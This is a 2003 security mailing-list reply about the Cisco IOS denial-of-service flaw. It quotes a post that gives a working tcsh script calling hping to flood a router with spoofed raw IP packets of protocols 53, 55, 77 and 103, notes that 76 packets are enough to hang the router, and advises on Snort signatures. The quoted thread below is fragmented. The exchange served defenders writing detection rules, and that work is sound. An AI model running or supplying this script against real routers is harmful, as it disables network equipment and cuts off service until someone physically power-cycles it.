Re: Cisco IOS Denial of Service that affects most Cisco IOS routers- requires power cycle to recover

I think this is what you're looking for.

<snip>
Subject: RE: [Snort-users] RE: [Snort-sigs] Suggested Sig for Cisco DOS Vulnerability

Here's a simple script I wrote that you can use to generate an attack:

> cat exploit.sh

#!/bin/tcsh -f

if ($1 == "" || $2 == "") then
  echo "usage: $0 <router hostname|address> <ttl>"   exit
endif

foreach protocol (53 55 77 103)

    /usr/local/sbin/hping $1 --rawip --rand-source --ttl $2 --ipproto $protocol --count 19 --interval u250 --data 26 end

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

As you can see, this script iterates over the various protocols and sends 19 packets each for a total of 76 (just enough to fill up the input queue on vulnerable routers). Before upgrading my routers, I confirmed that this attack works. I then tested to see if sending 76 packets of a single protocol was enough to hose the interface.. it was. Maybe I mis-read the original advisory, but it seemed to me that Cisco suggested all 4 were necessary.

Therefore, be careful when creating your signatures.. If you don't use any of the above protocols (SWIPE, IP Mobility, Sun ND, PIM) it might make sense to have rules that log/alert on all of them. Don't make the rules too dependent on the payload either; in several packet captures I've seen, the payload is significantly larger than the 26 bytes necessary to exploit IOS.

--
Patrick Donahue
Network/Systems Administrator
ACMI Corporation
</snip>
----- Original Message ----- 
From: "Curt Purdy" <purdy@tecman.com>
To: <rnews@river.com>; <incidents@securityfocus.com>
Sent: Sunday, July 20, 2003 7:58 PM
Subject: RE: Cisco IOS Denial of Service that affects most Cisco IOS
routers- requires power cycle to recover




> Could we have an example of an hping command to invoke this.  I have been


>

> Curt

>


> ----------------------------------------


>

> Practice safe hex.


>

> - Andrew Briney, editor Information Security


>
>

> -----Original Message-----


>
>

> In article


>

> > information on the detailed structure of the evil packets in these


>
>

> The router has problems if it receives a packet, content irrelevant,


>

> The kickup to supervisor level happens when the packet is targeted

> directly at the router's IP address (per first Cisco advisory) or just

> has its TTL expire in transit past the router (per revised Cisco


> advisory).


>

> Send enough packets (default 75), and the input queue is full.  hping is


>
>


> Richard


>

> --

> My mailbox. My property. My personal space. My rules. Deal with it.


>


> --------------------------------------------------------------------------


--

> Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the


CSO's

> to

> "underground" security specialists.  See for yourself what the buzz is


--
>
>
>


> --------------------------------------------------------------------------


-


> --------------------------------------------------------------------------


--
>
>
>


---------------------------------------------------------------------------
----------------------------------------------------------------------------